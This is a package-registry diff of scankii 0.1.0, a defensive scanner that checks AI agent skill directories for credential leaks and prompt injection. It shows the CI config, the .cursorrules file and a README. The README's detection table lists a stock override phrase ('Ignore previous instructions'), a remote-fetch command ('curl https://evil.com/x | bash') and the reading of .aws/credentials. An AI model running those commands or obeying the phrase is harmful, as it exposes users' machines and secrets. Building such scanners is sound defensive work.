scankii 0.1.0__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (46)
  1. scankii-0.1.0/.cursorrules +12 -0
  2. scankii-0.1.0/.github/workflows/scankii.yml +40 -0
  3. scankii-0.1.0/.gitignore +59 -0
  4. scankii-0.1.0/PKG-INFO +310 -0
  5. scankii-0.1.0/PLAN.md +318 -0
  6. scankii-0.1.0/README.md +295 -0
  7. scankii-0.1.0/action.yml +67 -0
  8. scankii-0.1.0/credential_safe/__init__.py +6 -0
  9. scankii-0.1.0/credential_safe/pyproject.toml +18 -0
  10. scankii-0.1.0/examples/vulnerable-skill/README.md +6 -0
  11. scankii-0.1.0/examples/vulnerable-skill/SKILL.md +14 -0
  12. scankii-0.1.0/examples/vulnerable-skill/run.py +15 -0
  13. scankii-0.1.0/hooks/pre-commit +58 -0
  14. scankii-0.1.0/prompts.md +361 -0
  15. scankii-0.1.0/pyproject.toml +32 -0
  16. scankii-0.1.0/rules/credentials.yaml +154 -0
  17. scankii-0.1.0/rules/malicious.yaml +121 -0
  18. scankii-0.1.0/rules/nl_patterns.yaml +36 -0
  19. scankii-0.1.0/rules/sinks.yaml +92 -0
  20. scankii-0.1.0/scankii/__init__.py +3 -0
  21. scankii-0.1.0/scankii/cli.py +68 -0
  22. scankii-0.1.0/scankii/core/__init__.py +1 -0
  23. scankii-0.1.0/scankii/core/ast_analyzer.py +388 -0
  24. scankii-0.1.0/scankii/core/cross_modal.py +131 -0
  25. scankii-0.1.0/scankii/core/nl_analyzer.py +163 -0
  26. scankii-0.1.0/scankii/core/patterns.py +101 -0
  27. scankii-0.1.0/scankii/core/scorer.py +146 -0
  28. scankii-0.1.0/scankii/output/__init__.py +1 -0
  29. scankii-0.1.0/scankii/output/cli_reporter.py +128 -0
  30. scankii-0.1.0/scankii/output/explain.py +227 -0
  31. scankii-0.1.0/scankii/output/json_reporter.py +22 -0
  32. scankii-0.1.0/scankii/output/sarif.py +218 -0
  33. scankii-0.1.0/scankii/runtime/__init__.py +1 -0
  34. scankii-0.1.0/scankii/runtime/safe_logger.py +142 -0
  35. scankii-0.1.0/scankii/scanner.py +228 -0
  36. scankii-0.1.0/templates/SKILL.md.template +71 -0
  37. scankii-0.1.0/tests/__init__.py +1 -0
  38. scankii-0.1.0/tests/test_ast_analyzer.py +179 -0
  39. scankii-0.1.0/tests/test_cli.py +33 -0
  40. scankii-0.1.0/tests/test_cross_modal.py +151 -0
  41. scankii-0.1.0/tests/test_explain.py +52 -0
  42. scankii-0.1.0/tests/test_nl_analyzer.py +140 -0
  43. scankii-0.1.0/tests/test_patterns.py +155 -0
  44. scankii-0.1.0/tests/test_safe_logger.py +135 -0
  45. scankii-0.1.0/tests/test_scanner.py +78 -0
  46. scankii-0.1.0/tests/test_scorer.py +156 -0
@@ -0,0 +1,12 @@
1
+ This is a Python CLI security tool called scankii.
2
+ It scans LLM agent skill directories for credential leakage.
3
+ It analyzes both natural language (SKILL.md) and source code together.
4
+ It uses tree-sitter for AST analysis.
5
+ It uses the rich library for all terminal output.
6
+ Always write type hints on every function.
7
+ Always write docstrings on every function.
8
+ Always write a corresponding test in /tests for every module.
9
+ Keep every function under 40 lines.
10
+ No external LLM API calls anywhere in the codebase.
11
+ No unnecessary dependencies.
12
+ Credential patterns live in rules/ YAML files, never hardcoded in Python.
@@ -0,0 +1,40 @@
1
+ name: scankii CI
2
+
3
+ on:
4
+ push:
5
+ branches: [main]
6
+ pull_request:
7
+ branches: [main]
8
+
9
+ jobs:
10
+ test:
11
+ runs-on: ubuntu-latest
12
+ strategy:
13
+ matrix:
14
+ python-version: ["3.11"]
15
+
16
+ steps:
17
+ - name: Checkout
18
+ uses: actions/checkout@v4
19
+
20
+ - name: Set up Python ${{ matrix.python-version }}
21
+ uses: actions/setup-python@v5
22
+ with:
23
+ python-version: ${{ matrix.python-version }}
24
+
25
+ - name: Install dependencies
26
+ run: |
27
+ python -m pip install --upgrade pip
28
+ pip install -e ".[dev]"
29
+ pip install pytest-cov
30
+
31
+ - name: Run tests with coverage
32
+ run: |
33
+ pytest tests/ -v --cov=scankii --cov-report=term-missing --cov-fail-under=80
34
+
35
+ - name: Upload coverage
36
+ if: always()
37
+ uses: actions/upload-artifact@v4
38
+ with:
39
+ name: coverage-report
40
+ path: htmlcov/
@@ -0,0 +1,59 @@
1
+ # Byte-compiled / optimized / DLL files
2
+ __pycache__/
3
+ *.py[cod]
4
+ *$py.class
5
+
6
+ # C extensions
7
+ *.so
8
+
9
+ # Distribution / packaging
10
+ .Python
11
+ build/
12
+ develop-eggs/
13
+ dist/
14
+ downloads/
15
+ eggs/
16
+ .eggs/
17
+ lib/
18
+ lib64/
19
+ parts/
20
+ sdist/
21
+ var/
22
+ wheels/
23
+ *.egg-info/
24
+ .installed.cfg
25
+ *.egg
26
+ MANIFEST
27
+
28
+ # Unit test / coverage reports
29
+ htmlcov/
30
+ .tox/
31
+ .nox/
32
+ .coverage
33
+ .coverage.*
34
+ .cache
35
+ nosetests.xml
36
+ coverage.xml
37
+ *.cover
38
+ *.py,cover
39
+ .hypothesis/
40
+ .pytest_cache/
41
+
42
+ # Environments
43
+ .env
44
+ .venv
45
+ env/
46
+ venv/
47
+ ENV/
48
+ env.bak/
49
+ venv.bak/
50
+
51
+ # scankii specific generated reports
52
+ findings.json
53
+ findings.sarif
54
+
55
+ # IDEs and Editors
56
+ .idea/
57
+ .vscode/
58
+ *.swp
59
+ *.swo
scankii-0.1.0/PKG-INFO ADDED
@@ -0,0 +1,310 @@
1
+ Metadata-Version: 2.4
2
+ Name: scankii
3
+ Version: 0.1.0
4
+ Summary: Scan LLM agent skill directories for credential leakage
5
+ Requires-Python: >=3.10
6
+ Requires-Dist: click
7
+ Requires-Dist: pyyaml
8
+ Requires-Dist: rich
9
+ Requires-Dist: tree-sitter
10
+ Requires-Dist: tree-sitter-javascript
11
+ Requires-Dist: tree-sitter-python
12
+ Provides-Extra: dev
13
+ Requires-Dist: pytest; extra == 'dev'
14
+ Description-Content-Type: text/markdown
15
+
16
+ # scankii
17
+
18
+ **The Open-Source, Local-First Semgrep for AI Agent Skills.**
19
+
20
+ `scankii` is a specialized static analysis tool designed to detect credential leaks, prompt injections, and cross-modal vulnerabilities in AI agent skills before they are deployed.
21
+
22
+ Unlike traditional secret scanners that only inspect source code, `scankii` understands the agent execution model. It analyzes both your **Natural Language instructions (`SKILL.md`)** and your **source code** together as a single unit to catch complex, multi-stage credential exposures that other tools miss.
23
+
24
+ ---
25
+
26
+ ## The Problem: Cross-Modal Leakage
27
+
28
+ In modern LLM agent architectures, agents read natural language instructions and execute code. This creates a unique vulnerability:
29
+
30
+ 1. **The Code is "Safe":** The source code might securely read an API key from the environment and use it.
31
+ 2. **The Markdown is "Safe":** The `SKILL.md` might benignly explain how to use the skill.
32
+ 3. **The Intersection is Vulnerable:** If the `SKILL.md` instructs the agent to pass a credential to a function, and that function prints it for debugging, the agent framework captures that `stdout` and injects it back into the LLM context window. The secret is now exposed to prompt injection attacks.
33
+
34
+ `scankii` is the first open-source scanner purpose-built to detect these cross-modal vulnerabilities.
35
+
36
+ ---
37
+
38
+ ## How scankii works
39
+
40
+ `scankii` employs a dual-engine static analysis pipeline to evaluate both the instructional and executable components of an agent skill simultaneously.
41
+
42
+ ```mermaid
43
+ graph TD
44
+ subgraph "scankii Pipeline"
45
+ direction TB
46
+
47
+ subgraph "1. Static Analysis"
48
+ A[SKILL.md] -->|Natural Language| B[NLP Semantic Analyzer]
49
+ C[Source Code] -->|AST Parsing| D[AST Syntax Analyzer]
50
+ end
51
+
52
+ subgraph "2. Cross-Modal Correlation"
53
+ B -->|Extracted Intents| E{Cross-Modal Engine}
54
+ D -->|Variable Sinks| E
55
+ end
56
+
57
+ subgraph "3. Scoring & Reporting"
58
+ E -->|Unmatched Findings| F[Scorer]
59
+ E -->|Correlated Leaks| F
60
+ F -->|Severity Assessment| G[Reporters]
61
+ end
62
+ end
63
+
64
+ G --> H((Terminal UI))
65
+ G --> I((JSON))
66
+ G --> J((SARIF))
67
+
68
+ style A fill:#f9f,stroke:#333,stroke-width:2px
69
+ style C fill:#bbf,stroke:#333,stroke-width:2px
70
+ style E fill:#f96,stroke:#333,stroke-width:2px
71
+ ```
72
+
73
+ 1. **NLP Semantic Analyzer:** Uses constrained pattern matching to scan `SKILL.md` for prompt injections, social engineering, and instructions that mandate the passing of credentials.
74
+ 2. **AST Syntax Analyzer:** Parses the source code to build an Abstract Syntax Tree. It tracks variables and detects if they flow into dangerous sinks like `print()`, file I/O, or unauthenticated network requests.
75
+ 3. **Cross-Modal Engine:** Correlates findings from both engines. If the `SKILL.md` instructs passing an API key, and the code prints that parameter to stdout, the engine escalates it as a high-severity cross-modal leak.
76
+ 4. **Scorer:** Applies a multiplicative scoring model based on exploitability, channel risk, and credential type to determine the final severity (LOW to CRITICAL).
77
+
78
+ ---
79
+
80
+ ## Demo
81
+
82
+ ```
83
+ $ scankii scan examples/vulnerable-skill --explain
84
+
85
+ ┏━━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━━━━━━┳━━━━━━━━━┳━━━━━━━━━━┓
86
+ ┃ File ┃ Line ┃ Pattern ┃ Channel ┃ Severity ┃
87
+ ┡━━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━━━━━━╇━━━━━━━━━╇━━━━━━━━━━┩
88
+ │ run.py │ 7 │ Cross-Modal Leak │ stdout │ MEDIUM │
89
+ │ run.py │ 9 │ Cross-Modal Leak │ network │ CRITICAL │
90
+ │ run.py │ 7 │ Cross-Modal Leak │ stdout │ MEDIUM │
91
+ │ run.py │ 9 │ Cross-Modal Leak │ network │ CRITICAL │
92
+ │ run.py │ 7 │ Cross-Modal Leak │ stdout │ MEDIUM │
93
+ │ run.py │ 9 │ Cross-Modal Leak │ network │ CRITICAL │
94
+ └────────┴──────┴──────────────────┴─────────┴──────────┘
95
+
96
+ Total: 6 (CRITICAL: 3, MEDIUM: 3)
97
+
98
+ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
99
+ 🚨 CRITICAL — Information Exposure via network
100
+ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
101
+
102
+ Pattern: Information Exposure
103
+ Channel: network
104
+ File: run.py, line 9
105
+ Score: 5.04
106
+
107
+ Attack Flow:
108
+ SKILL.md [line 1] ← instructs agent to pass api_key to execute()
109
+
110
+ execute(api_key) [run.py:9] ← credential enters function
111
+
112
+ requests.get(api_key) [run.py] ← sinks to network
113
+
114
+ network ← exfiltrated externally
115
+
116
+ LLM context window ← credential now queryable via natural language
117
+
118
+ Suggested Fix:
119
+ Replace: hardcoded credential in network call
120
+ With: Read credential from environment variable
121
+ import os
122
+ api_key = os.environ.get('API_KEY')
123
+
124
+ ╭──────────────────────────────╮
125
+ │ Scan Summary │
126
+ │ ┏━━━━━━━━━━┳━━━━━━━┓ │
127
+ │ ┃ Severity ┃ Count ┃ │
128
+ │ ┡━━━━━━━━━━╇━━━━━━━┩ │
129
+ │ │ CRITICAL │ 3 │ │
130
+ │ │ HIGH │ 0 │ │
131
+ │ │ MEDIUM │ 3 │ │
132
+ │ │ LOW │ 0 │ │
133
+ │ │ TOTAL │ 6 │ │
134
+ │ └──────────┴───────┘ │
135
+ ╰──────────────────────────────╯
136
+ ```
137
+
138
+ ---
139
+
140
+ ## Install
141
+
142
+ ```bash
143
+ pip install scankii
144
+ ```
145
+
146
+ ---
147
+
148
+ ## Usage
149
+
150
+ `scankii` runs 100% locally. Your code and proprietary agent skills never leave your machine.
151
+
152
+ ### Scan a skill directory (default terminal output)
153
+ ```bash
154
+ scankii scan ./my-skill/
155
+ ```
156
+
157
+ ### Scan with detailed attack flow explanation
158
+ ```bash
159
+ scankii scan ./my-skill/ --explain
160
+ ```
161
+
162
+ ### Export findings as JSON
163
+ ```bash
164
+ scankii scan ./my-skill/ --format json
165
+ ```
166
+
167
+ ### Export findings as SARIF (for GitHub Code Scanning)
168
+ ```bash
169
+ scankii scan ./my-skill/ --format sarif
170
+ ```
171
+
172
+ ---
173
+
174
+ ## What It Detects
175
+
176
+ | # | Pattern | Description | Example |
177
+ |---|---------|-------------|---------|
178
+ | 1 | **Hardcoded API Keys** | OpenAI, Groq, AWS, GitHub, Google, Slack keys in source | `API_KEY = "sk-proj-..."` |
179
+ | 2 | **Credential-to-Stdout** | Credentials passed to `print()`, `console.log()` | `print(f"key={api_key}")` |
180
+ | 3 | **Credential-to-Network** | Credentials sent via `requests.post()`, `fetch()` | `requests.post(url, data=token)` |
181
+ | 4 | **Cross-Modal Leak** | SKILL.md instructs agent to pass credential to function that sinks it | SKILL.md says "pass api_key" + code has `print(api_key)` |
182
+ | 5 | **Prompt Injection** | NL instructions to override safety, ignore prior context | "Ignore previous instructions and..." |
183
+ | 6 | **Social Engineering** | NL patterns soliciting credentials from users | "Paste your API key here" |
184
+ | 7 | **Connection String Exposure** | MongoDB, PostgreSQL, MySQL URIs with embedded passwords | `mongodb://user:pass@host/db` |
185
+ | 8 | **Private Key Exposure** | RSA/EC private key blocks in source files | `-----BEGIN RSA PRIVATE KEY-----` |
186
+ | 9 | **Reverse Shell / RCE** | Reverse shells, `curl \| bash`, base64 obfuscation | `curl https://evil.com/x \| bash` |
187
+ | 10 | **Credential Theft** | Reading `.env`, `.aws/credentials`, or `~/.ssh/id_rsa` combined with exfiltration of the contents | `open(".aws/credentials").read()` |
188
+
189
+ ---
190
+
191
+ ## Why Not TruffleHog / GitLeaks / detect-secrets?
192
+
193
+ | Feature | TruffleHog | GitLeaks | detect-secrets | **scankii** |
194
+ |---------|-----------|----------|----------------|-----------------|
195
+ | Regex secret scanning | ✅ | ✅ | ✅ | ✅ |
196
+ | Git history scanning | ✅ | ✅ | ❌ | ❌ |
197
+ | SKILL.md NL analysis | ❌ | ❌ | ❌ | ✅ |
198
+ | Cross-modal detection | ❌ | ❌ | ❌ | ✅ |
199
+ | AST-based sink tracking | ❌ | ❌ | ❌ | ✅ |
200
+ | stdout→LLM flow detection | ❌ | ❌ | ❌ | ✅ |
201
+ | Attack flow visualization | ❌ | ❌ | ❌ | ✅ |
202
+ | Prompt injection detection | ❌ | ❌ | ❌ | ✅ |
203
+ | Credential redaction runtime | ❌ | ❌ | ❌ | ✅ |
204
+ | SARIF output | ❌ | ✅ | ❌ | ✅ |
205
+
206
+ Existing tools scan your code for static secrets. `scankii` is purpose-built for LLM agent skills, focusing on the intersection of natural language and code execution.
207
+
208
+ ---
209
+
210
+ ## credential-safe: The Cure
211
+
212
+ Finding vulnerabilities is only half the battle. `scankii` includes `credential-safe`, a drop-in replacement for `print()` and Python logging that automatically redacts credentials before they reach stdout (and therefore the LLM context window).
213
+
214
+ ```python
215
+ from credential_safe import SafeLogger, safe_print
216
+
217
+ logger = SafeLogger()
218
+ logger.info(f"Using key: {api_key}")
219
+ # Output: INFO: Using key: sk-[REDACTED]
220
+
221
+ safe_print(f"Token: {token}")
222
+ # Output: Token: ghp-[REDACTED]
223
+ ```
224
+
225
+ ```bash
226
+ pip install credential-safe
227
+ ```
228
+
229
+ ---
230
+
231
+ ## Enterprise Integrations
232
+
233
+ ### GitHub Action
234
+
235
+ Add to your workflow to scan skills on every PR and upload results to GitHub Code Scanning:
236
+
237
+ ```yaml
238
+ name: Skill Guard
239
+ on: [push, pull_request]
240
+
241
+ jobs:
242
+ scan:
243
+ runs-on: ubuntu-latest
244
+ steps:
245
+ - uses: actions/checkout@v4
246
+ - uses: scankii/scankii@v1
247
+ with:
248
+ path: ./skills/
249
+ severity-threshold: high
250
+ sarif-upload: true
251
+ fail-on-findings: true
252
+ ```
253
+
254
+ ### Pre-commit Hook
255
+
256
+ Catch secrets on your own machine before they are committed. Add to `.pre-commit-config.yaml`:
257
+
258
+ ```yaml
259
+ repos:
260
+ - repo: https://github.com/scankii/scankii
261
+ rev: v0.1.0
262
+ hooks:
263
+ - id: scankii
264
+ name: scankii
265
+ entry: hooks/pre-commit
266
+ language: script
267
+ types: [file]
268
+ files: '\.(md|py|js|ts)$'
269
+ ```
270
+
271
+ ---
272
+
273
+ ## Using the Secure Template
274
+
275
+ Copy our hardened SKILL.md template to start building a new skill securely from day one:
276
+
277
+ ```bash
278
+ cp templates/SKILL.md.template my-new-skill/SKILL.md
279
+ ```
280
+
281
+ The template includes:
282
+ - Inline security comments explaining what NOT to do
283
+ - Correct credential handling patterns (environment variables only)
284
+ - A security checklist to verify before publishing
285
+
286
+ ---
287
+
288
+ ## Contributing
289
+
290
+ 1. Fork the repository
291
+ 2. Create a feature branch: `git checkout -b feature/my-feature`
292
+ 3. Write tests for your changes
293
+ 4. Ensure all tests pass: `pytest tests/ -v`
294
+ 5. Run scankii on the repo: `scankii scan .`
295
+ 6. Submit a pull request
296
+
297
+ ### Development Setup
298
+
299
+ ```bash
300
+ git clone https://github.com/scankii/scankii.git
301
+ cd scankii
302
+ pip install -e ".[dev]"
303
+ pytest tests/ -v
304
+ ```
305
+
306
+ ---
307
+
308
+ ## License
309
+
310
+ MIT